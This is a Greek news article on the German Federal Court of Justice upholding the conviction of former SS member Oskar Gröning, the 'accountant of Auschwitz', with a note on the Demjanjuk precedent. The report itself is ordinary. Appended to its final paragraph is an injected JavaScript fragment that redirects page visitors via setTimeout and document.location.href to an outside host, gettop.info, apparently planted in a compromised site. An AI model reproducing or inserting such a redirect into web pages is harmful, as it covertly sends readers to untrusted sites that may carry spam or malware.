Επικυρώθηκε η καταδίκη του «λογιστή» του Άουσβιτς

0
4

 

Περισσότερο από ένα χρόνο χρειάστηκε το γερμανικό Ομοσπονδιακό Ακυρωτικό Δικαστήριο (BGH) για να επικυρώσει την ποινή που επέβαλε το 2015 δικαστήριο του Λίνεμπουργκ στον 95χρονο εθελοντή των SS Όσκαρ Γκρένινγκ, ο οποίος στον β΄ Παγκόσμιο Πόλεμο στο στρατόπεδο συγκέντρωσης στο Άουσβιτς επέβλεπε τις αφίξεις των τραίνων με τους Εβραίους και κατέγραφε τα χρήματα των κρατουμένων που κατάσχονταν από τους φύλακες, σύμφωνα με την Deutsche Welle.

Το δικαστήριο του Λίνεμπουργκ είχε αποφανθεί ότι παρά το γεγονός ότι ο Όσκαρ Γκρένινγκ δεν συμμετείχε προσωπικά στην εξόντωση κρατουμένων, με τις ενέργειές του συνέβαλε στην εύρυθμη λειτουργία του συστήματος μαζικής δολοφονίας εκατοντάδων χιλιάδων κρατουμένων. Περίπου 70 χρόνια μετά τον πόλεμο ήταν η δεύτερη τελεσίδικη απόφαση στη Γερμανία για συνέργεια σε μαζικές ανθρωποκτονίες χωρίς όμως να υπάρχει ενεργή συμμετοχή του κατηγορούμενου. Στην απόφαση του 2015 άσκησαν έφεση τόσο ο Όσκαρ Γκρένινγκ όσο και οι αρκετοί πολιτικοί ενάγοντες.

Θα εκτίσει την ποινή ο 95χρονος κατηγορούμενος;

Η απόφαση του Ομοσπονδιακού Ακυρωτικού Δικαστηρίου ανοίγει το δρόμο για τη δικαστική δίωξη και άλλων ατόμων που «βοήθησαν» το ναζιστικό καθεστώς, μιας και για πολλές δεκαετίες δεν διώκονταν άτομα, τα οποία δεν συνέβαλαν προσωπικά στην εξόντωση κρατουμένων. Σημείο καμπής θεωρείται συνεπώς η καταδίκη του πρώην δεσμοφύλακα του στρατοπέδου συγκέντρωσης του Σόριμπορ Τζον Ντέμγιανουκ το 2011 ενώπιον δικαστηρίου στο Μόναχο για συνέργεια σε ανθρωποκτονία 28.000 Εβραίων. Ο Ουκρανός ωστόσο δεν εξέτισε την ποινή που του επιβλήθηκε διότι απεβίωσε προηγουμένως σε οίκο ευγηρίας, στον οποίο ζούσε.

Άγνωστο παραμένει μέχρι αυτή την ώρα αν ο Όσκαρ Γκρένινγκ εκτίσει τελικά την τετραετή κάθειρξη που του επέβαλε τελεσίδικα πλέον η γερμανική δικαιοσύνη. Όλα εξαρτώνται τώρα από την κατάσταση της υγείας του 95χρονου «λογιστή» του Άουσβιτς. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here